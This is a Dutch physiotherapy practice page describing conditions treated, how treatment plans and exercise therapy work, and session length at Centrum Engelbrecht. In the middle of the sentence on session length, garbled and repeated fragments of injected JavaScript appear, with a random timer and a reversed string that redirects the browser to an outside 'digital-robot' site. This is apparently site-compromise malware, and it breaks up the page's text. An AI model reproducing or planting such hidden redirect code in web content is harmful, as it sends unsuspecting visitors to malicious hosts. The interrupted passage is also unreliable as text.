//Fysiotherapie
Fysiotherapie 2017-12-15T11:29:31+01:00

Fysiotherapie

Fietsen, lopen, springen, bukken: bij veel dagelijkse bewegingen denken we nauwelijks na. We vertrouwen blindelings op onze spieren, botten en gewrichten. Maar dat bewegen niet zo vanzelfsprekend is, beseffen we als we ergens last van krijgen en het lichaam even niet meewerkt. Als fysiotherapeut weet ik hier alles van. U kunt bij mij terecht voor de behandeling van klachten, maar ook om (ergere) klachten te voorkomen.

Wanneer fysiotherapie?
Fysiotherapie kan zinvol zijn bij rugklachten, sportblessures, gewrichtsklachten, pees- en slijmbeursontstekingen, schouderklachten, problemen bij het lopen, etc.

Hoe gaat het in zijn werk?
Ik onderzoek eerst welke problemen en beperkingen u hebt. Vervolgens stel ik samen met u een behandelplan op. Dit is maatwerk. Elk mens is anders, elke klacht is anders en elk lichaam reageert anders. Een belangrijk onderdeel van de behandeling is oefentherapie. Die is bedoeld om de bewegingsmogelijkheden van gewrichten te beïnvloeden en spierkracht te vergroten. En ook om een betere houding aan te leren, beter evenwicht te realiseren, een andere ademhalingstechniek te leren of te ontspannen.

Ter ondersteuning van de oefentherapie kan ik ook gebruik maken van massage en fysiotechniek. Een behandeling duurt meestal een half uur dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tot een uur. Als aanvulling op de therapie kunt u in Centrum Engelbrecht ook workshops volgen waarin u ademhalings- en ontspanningstechnieken leert.

Meer weten? Neem gerust contact op voor meer informatie of het maken van een afspraak.